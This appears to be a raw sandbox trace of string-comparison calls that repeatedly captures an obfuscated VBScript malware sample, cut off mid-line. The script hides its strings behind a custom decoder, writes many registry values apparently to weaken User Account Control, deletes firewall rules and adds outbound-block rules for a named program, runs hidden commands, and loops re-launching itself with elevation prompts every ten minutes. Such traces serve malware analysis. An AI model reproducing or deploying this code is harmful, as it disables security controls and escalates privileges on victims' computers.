bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 31 [0222.966] wcsncmp (_String1="1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36 [0222.966] wcsncmp (_String1="))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 28 [0222.966] wcsncmp (_String1=")-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 28 [0222.967] wcsncmp (_String1="-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 